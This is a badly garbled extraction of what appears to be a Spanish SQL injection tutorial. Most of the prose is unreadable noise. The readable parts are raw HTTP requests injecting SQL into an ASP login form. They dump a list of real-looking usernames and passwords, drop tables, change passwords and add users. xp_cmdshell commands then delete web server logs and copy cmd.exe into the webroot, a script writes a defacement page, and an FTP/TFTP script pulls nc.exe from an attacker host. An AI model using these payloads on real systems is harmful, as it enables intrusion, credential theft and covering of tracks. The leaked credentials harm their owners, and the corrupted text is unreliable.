Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 82
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27+union+select+sum(UID)%2C1%2C1%2C1+from+usu
arios--&txtPassword=Angel
Y Y
Y H 9 6 " >! "" >
Y * . "
Y
H + L " " E ,F& & & * " "00

6 ( "& . 4 " " = 1

6 !:#; " " 6 )4 6 & ) " "
". <

Microsoft OLE DB Provider for ODBC Drivers error

'80040e07'[Microsoft][ODBC SQL Server Driver][SQL
Server]The sum or average aggregate operation cannot take
a nvarchar data type as an argument.
/Login.asp, line 85

- " " 6 9 6 :,-' " "

) " " & 4 6 "
" E> ,> " 4 F " " ) 9 "
I8 " 9 " " " " 1:& 6 ( " "
& " 6 " " 9 = "

, ) 9 " " " " " )

) ( & "= & + )
 2

" " 6 "& " ) * " (

" " #$% ) " " ) " E! " " " )4 6
#$%KK& IIF

8 "& " " " " " " &

" " " " "" #$% 1 :1& 9 4
" # + " " " & "
) ) " ( & ; !: ,8 ,5;: 9
" " "9 ". " "

! " " . &9 " 9 " " " + I

:M& < ' " 5 + " < =" >5 6 #$%
4 ` a>& #$% ># > 6
* & 6 " " & #$% " <
* " " 4 " 9 " " " " " " "
" " " 4 " * 9 " 4 " +
> ,>

8" " 4 " 4 6 9 " " 1H5 ' 5 EA ""

" " F " 6 #$% " " >9 4 > 7 " 9
. # 1H5 ' 5

- . " & " 6" 6 7 " . " " " +

"" "& " . ) ) " "
#$% ! . * & )" 6 " 9 " 6

1 &( ! (! " " " ! <1

# 5 :# " " " ! M
" " " %"# "
4 # # " " " ,
" " " # )!% #, " " " , M
" " " ." , " " , E1 ) " F
" " " ! ) ! * " " #
" " " ! * M " " !G# E' " D F
" " " ! * " 8
" " " ! <# "

' 6 &" * * " ( " )

"& " + " " " "& . " " "
6 " < " ! & " > .
" D > > . > " E! .J F 9 "
& " " "& " " ) " 9 " .
" " " ) " ) " " " " ) "& + " "
" 6" " > >& 9 ;:,5 * *
6 " )4 6 & b 1;5 >86 "&
, " ) +8 > . " "" " 4
. " , & " & E% " 9
) 9 F . . 9 " +
" "
 2

4; ! * #! ! !< !& ! (!
6 ( #$%& (
" " " . " * ) "
" )4 6 & ( . " " 7 " 9 " ) "

= (! , 8 .=
# . "& >) " > ) " " "
. & " "9 6 ) "
" " A=4 " 9 * . " ) *
* 4 . " " "" ) " " 6 &
( 7 " " " "

> $6 3 / (! 6#; !

% " " " & " ( *

#$% . ) " 6 " 1;: 9 " .
" ." E% 9 " * 6 " 6" ( F *
* "6 " " " , + !G#

H 6 " " " F+6 " * 9 ) =

6 !:#; +

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27+declare+@aux+varchar%288000%29+set+@aux%3D
%27%27+select+@aux%3D@aux+%2B+UID%2B%27/%27%2BPWS%2B%27%3
B%27+from+usuarios+where+UID%3E@aux+select+@aux+as+aux+in
to+xtmp--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
 2

H + L <6 EB F" <VLL "

<V <[ [L L[ "[L]L* " " U <" < " <
< W

-> $6 3 , 8 . ! (! 6#; !

6 ( " " & " ) " +

#8%8'; ) ( 7
" "

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 76
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27union+select+aux%2C1%2C1%2C1+from+xtmp--
&txtPassword=Angel
Y Y
H 9 6 " Y
>! "" > * Y
. " Y

H + "L " <& & & * < 00

) ( " !:#; * & 6 :,-' 6 6

" " ) " 4 " * .) " .
* * " " "

Login de Usuarios Registrados

Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'[Microsoft][ODBC SQL Server Driver][SQL
Server]Syntax error converting the varchar value
'Danyr2/pepe;THEMA/M1703;CIELORIANO/daniel;ALELARRAINP/14
05;SANDRA/4484188;0001/13119695;AsdrubalCh/1173;beatrizay
ala/10338154;maria_perez/12345;batv/peresosita;susy/susyk
a;Mireya_Salazar/gabriela;MVidales/male;AngelicaS/chainy;
 22

carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne
ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2
11095;victor...
/Login.asp, line 85

2> $6 3 4! & ! (! 6#; !

6 ( ) " " ") " "& )

( " & " . +
, :!& " " ". 4

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 53
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Bdrop+table+xtmp--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > * . "
Y
H + L] ) < 00

- 6! !
; " " "" " " " " . &" " "
" 6 " " " . 6 ) " """ "&
"& 9 ( 6 "9 . * &
" " 5 " " " "
") " "9 " * & . .
." " " ) " "

$+6 4

H " 4 9 " " " !:#; (

"" " . "" 6= + "
!,5;8
 23

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 103
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%2
7+where+uid%3D%27Carla%27--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + L " "" "VL1 6 ! ""L VL' L00

+4 4 4

# & . " * " !:#; & . "

+ 9 E5 9 " *
9 " " #$% # 6 F ."

H + 'delete from usuarios where UID='Usuario'--

1 4

$ " 1#8 ;& ) "9 " "

4 & " " 9 &
" " " "& " " 6 " 6 " "
" " 9 + . " " " !
& " " ) ( . & +
4 " & . " E' " 4
KKKF " = " ) " . 9 =
9 "" ( " 7 & 6 "
" " "& + . ( 9 " "
")
 2?

5"= " & " 9 <" " " " 1#8 ; "
" 9 " ) " & 4 * " + &
". = 9 " " " "
( " !:#; 6= :)6 7< " +
. * 9 " + . &
" ) " " " "+" " " 6 " "

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 113
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina

txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser
%27%2C%27MyPassword%27%29--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + L] " " "6 " EL + " L&L +! "" LF00

% & & ! !
" . " . " ! " )
( . " 7 "" " #$% 4 " " "(
" " " * " * &
) " 6" II * 6 1: " " .
& " "* "9 " * #$% # 6
" >8< # ! "> "
< "

$ # ?4; $ #
% " " < " " " & ,%%L" 9 < " "
) " " " " & " "
" " 8< " " " " < "&
6 " #0#$%& " ") *
" 5 . " "& #0#$% ) ") .
 2@

" " " < " "& "

" & * " ) ) " " " 9 "

5 ) " * " "& " " " " "

" "" " " "9 " + " (
" " " < Q "

N Q " " 4 " "" 6 6= #$%

> "> " K6 " ( = " " " ". "
4 " " ;;!

POST /Login.asp?validar=2 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 90
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27%3BEXEC+master.dbo.xp_cmdshell%27cmd.exe
+dir+c%3A%27--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + "L]8N8' " ) < Q " L < L00

:M ) " " " + * )

9 " 4 & " ) 4 " #5
E 6 " " ") " ( < Q "F
, " * " " )" 6 " " "
= " ) " * "6 > > . 9 "
) " * . "6 " E8 " " & & & " & F

5 4 &6 " . " "* " 9 "

" = 6 " " < Q " E/ "1
) 4 " ) " " = "F
 2

! "
EXEC master..xp_cmdshell 'dir c:\inetpub\wwwroot\'

! 6 9 6
EXEC master..xp_cmdshell 'type
c:\inetpub\wwwroot\alguna_pagina.asp'

! " )
EXEC master..xp_cmdshell 'copy c:\winnt\system32\cmd.exe
c:\inetpub\wwwroot\chroot.exe'

! ) "
EXEC master..xp_cmdshell 'DIR
c:\winnt\system32\logfiles\w3svc1\'
EXEC master..xp_cmdshell 'NET STOP "Servicio de
publicación en
World Wide Web"'
EXEC master..xp_cmdshell 'del
c:\winnt\system32\logfiles\w3svc1\
filelog.log'
EXEC master..xp_cmdshell 'NET START "Servicio de
publicación en
World Wide Web"'

! 6 "
EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path'

! " 6 G "
EXEC master..xp_cmdshell 'NET USER username password'

:M& " ) . " " >8< # ! ">&

" . " " " " >1
8< ">& " " )7 ) " & 4 "
" " " " # " + "

'exec master..sp_addlogin MyUser, MyPass

9 " . " " ) 6 &" "

; " * & . . " " ) " 9

" ) & " " " " " >#
! "> + >8< # ! "> 9 ) = " " ) "
" " " ! " " " " " & "* " +
= #0#$% # 6 " * " "
" "+" " " 6 "* "
 2B

" Q " Q . < Q . 6

" Q < Q ) "M < Q" 6
" Q " + < Q . < Q "
" Q *. < Q . < Q
" Q "6 ) < Q . M + < Q 6 .

- $ %+ )
% " & * " & " " " +
" " ) " " "+ 7 " . " " #$%
4 & * + " ' " ) 4
) " " & 4 " " 9
* ( " " " ( 4
" > * >

% " 7 "& 9 " ( 67" #$% E$ +

+( 9 9 " < ) " " #$% 6=
:,-'F& " 9 "" #5& " )
" " 322& ) " . *
9 " # ) & ". " + " #$%&
. " .

- " " &9 4 * "

1 & " . " > . (( # + ; >& "
M <& < " " 7 "
6 " H " . "* . "

----- Extracto ------------------------------------------

[...] La idea es crear una pagina html o asp, si en
el sitio objetivo se encuentra activo y funciónando un
webserver [...]
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:\web-hosting\attajdid\index3.html', 1
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<HTML> <HEAD><TITLE>Hola Mundo!!!</TITLE> </HEAD>
<BODY text=black bgColor=#000000> <CENTER> <P><B>'
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<FONT face=Arial color=#b4b58c size=7>Vosotros
</B>Perejil...</B></FONT></P></CENTER> <P><BR><BR>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<!--" "--
></P>
<P></P> <CENTER> <P><B><FONT face=Arial
color=#b4b58c size=7>'
exec @ret=sp_oamethod @f, 'writeline', NULL, 'nosotros
vuestras
</B>WEB<B>s!!!</B></FONT></P></CENTER>
<P><BR><BR></P>'
 2C

exec @ret=sp_oamethod @f, 'writeline', NULL, '<DIV

align=center>
<CENTER> <TABLE cellSpacing=0 cellPadding=0
width=100 border=0>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<TBODY>
<TR> <TD bgColor=#d20000>&nbsp;</TD></TR>
<TR> <TD align=middle bgColor=#ffff00>'
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<FONT color=#ffff00 size=1>¡ORTO!<BR>¡¡¡Va
por vosotros!!!
</FONT></TD></TR> <TR> <TD '
exec @ret=sp_oamethod @f, 'writeline', NULL,
'bgColor=#d20000>&nbsp
;</TD></TR><!--" "--
></TBODY></TABLE></CENTER></DIV> '
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<P><BR><BR><BR><BR><BR></P>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<P
align=right>
<FONT face="Courier New" color=#00ff00 size=5>
lagear & runlevel</FONT></P>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<P
align=right>
<FONT face="Courier New" color=#00ff00
size=4>Recuerdos a
<B>N</B>9<B>Team</B></FONT>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '</P> <P
align=right>
<FONT face="Courier New" color=#00ff00 size=3>'
exec @ret=sp_oamethod @f, 'writeline', NULL, 'Donde te
podemos
encontrar BreakICE?</FONT></P> <FONT color=black>"
</FONT>
</BODY></HTML>'
Para subir archivos.- Creamos un archivo get.txt para
utilizar luego ftp
declare @o int, @f int, @t int, @ret int
EXECUTE sp_oacreate 'scripting.filesystemobject', @o out
EXECUTE sp_oamethod @o, 'createtextfile', @f out,
'c:\get.txt', 1
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'user
anonymous'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'get
nc.exe'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'quit'
EXECUTE master.xp_cmdshell 'FTP -s c:\get.txt
NUESTROHOST'
o algo mas fácil si tenemos un tftp en nuestro host
EXECUTE master.xp_cmdshell 'TFTP -i NUESTROHOST GET
c:\mi_local_file c:\remote_file'
 3

----- Extracto ------------------------------------------

:M& ) & ) " ( " " * "

" )4 " . " " 6" " "
#0#$% # 6 &
6 " *=" " 9 ") " .
" " " 8 " " &" " Q +" Q 9 "
" . " )4 :%8 " " * #$%
# 6 E " 4 " . * "+" )4 F + " 7 "
" " . )4 6 " ) "

;
" Q . &c " &
)4 M : ;! ;
`& < a

;
" Q )4 M &

`& 6 : ;! ; a
`&` Va ` : ;! ; a
` aa

" 3 , +

# ) " " " &9 #0#$%

" ) " "9 " 7" " " "& )
9 " . " " & " * " &
9 ) 4 .J 6" " J " " ) "
7 " #$% 4

! " 9 " D " + #$% 9 6

" ) "" " ) <" 6
& + = " ) " " " " ( " E: ) = "
"IF & " + * " " "
) * " 6 " . &" " #$% + "

5 ) "
* . >; : G )5 # +! 4 > "
" 7 . " " ) " " #$% 4 +
") " " " " "

0 *
# L 1;: : ;A %8L
' > >
% + = " "+ ) = " " J "" "
 3

03 !
# )" " ") "
1 :1 " )
H " " " E *Q* KF
1 " J "" "

0 +,-
# )" " ") "
1 :1 " )
! "5 "
1 " J "" "

0$ .
# ':!S E8 " " F
# )" " ") "
1 :1 " )
! "5 "
J "" "" " ) "K

0
# )" " ") "
1 :1 " )
! "5 "
J "" "" " ) "K
" " "" " " " *
E< Q " &" Q " F

"@ % &

A . & 6 " . * % " " "

9 " " " * " ( ".
* & " " 6 ) " " #0#$% "
7 " 4 " "

' " " & " " & " "

. " . "& " " " " ") ) )
" .

7 . " ( 6 # 6 ! M ""
6 " "9 " " 6
7 . " ( " J " " "" 6
" "9 " " 6
! 4 *=" " "" 6 " ) " "
8" ) ( ! = ' ( A " 6=
# * * " " < " " = " 8"
+ " ;'! 322 + ,! 323F
1 " " 6 " ) " " 6 ) " "
1 " " = & " 6 #$% " 6
" "
 3

! " " " . " . * . E, " 6 "

) " "" " . ( & M" )
*. F
H *9 6 " " "
" " #0#$% # 6
8" ) ( " 6 . " "& " ) " " 9
( " " " "
8" ) ( 6 " " . 6 " * " *
E " " " . ) 0 " " "
* ( " M " " MF
8" ) ( "" * #5
# " 9 " . & " " "
* " ." 6 #0#$% 6 '
1 4 ) ) " " 6 " "
" " " " . " (
" . " H 6 ) "
" ) " " ' 9 " " " " " " "
" " >$ > " " " 9 " " . ) " "

"A % B !

#0#$% # 6 " " & +" ") " 7 " +

6 " " 6 " . " . "
" " * " " "
" . & 9 9 ") " " ""
" ) + +" ( "
. 6 ( " " " " ) 4
" " " " " 6 " " " .

' " * & " " 9 . "

6 " " " 6 & <" " ) " " "
" . + " "" "9 + = " " "
6 ") " & ") < 7< " + " " 7 "
M ." ) #0#$% # 6

8 " " " . "& "

"
+ "* ( " "A " "&
" " +# 6 "! M" = & *. " "" 6
" ) " "& ". * " *
6 " " . G " & " ) "" 6 " " "&
" " " " ) > .= " ) " .
" . > + " " " " ) " " . &
) = 6 " #$% 4 . *= 4

# ) * " " & 74 " 6" "

* M . * " G " 8 " & "
" "* "& " " "" "+ " " " . *
) = " . " " " "
6 ) " 6 " E; " " #0#$%F 8"
) " " " " 9 " . " D " ". * )
" . ( # #;8 5 G "
 32

' 6 G " 2& + " " ") "9 " "

" " ) " " " .
E5 ( " 5 "& , 6 " # . & 8A#& F "= )7
%81;: " * " ( " " "
" * & " " 9 ". ) "
" #0 #& #0#$%& # " " 8 !& " " ) ( "
* & " . &+ 9
#:- 8 " " 6

5 " " 9 + "* " +9 " )

" " " " " + " 6 " " & "
" " 7 " 5
" 6 " . " " 7 " #$% 4 & 6
9 6" " > * " + % " ' ">
" " 9 " < 6

# " "& + " " <

5 " >5 . ! >

"C ) * # % & ! &

- M > M . 8< " G " > E #-1 B303B 022CB0@F

" M . M " Q QG "
"9 "9 Q 3
"9 " +
" * "9 6 6 " + "
" + " " #$% 4 G ! *
" " "
.Q#$%Q# 6 Q " .Q#$%Q 4 *
< . "" " 6 Q"9 Q 4 *
< . "" " Q 6 Q"9 Q 4 *
< . "" " 0#$% *
< . "" " M .0"9 0 "" " *
< . "" "6 .Q ) " Q" + *
" " + 6 " ?,! 1 ! @8
" . " Q6 "9 "

"D !

M <
M " " + * " M M
M " " + .' M " #9 )* (
 33

M " " + . 1; " " #9 M (

M " " + . G "9 <
M " " + . G "9 .(
M " " + + . )5 "0 0 @0) (
<< "
" " "* "
"
" M " " MQJ "
+ " ; "

"B % ! (

01 (
, :! "9 " " )+ 1
0 " . II )+ 5 .
0' ' % . " " F )+ 6
0S " * " ) " "
") "I )+ 5 . 59 =

6. &

** " * . & " " 9 " "

= " * " " 6 = " " " " " " (
. 6 . (( # + ; &
" . " > > < 1 ) 9 " * "9
= = &+9 " ) " " "&
" * 9 . " " + 9 " < ") " ""
" " " ) " ")

8 " . . & . ( " " "6 " " " "

D " 1 + 6 9 " "* ( " "
" * . 9 " " ") ( " " "
" * "

; )7 . " = + # 9 " " " "

" #0#$%& . " " " " .

/ " 9 "9 67" " " " " " +*

" " " #$% 4 E8" . O1 <
/ # +# * % d " " "J "KF

! & . " " 9 " . " " "

" " " " . * & <" 9 D

5 " >5 . ! >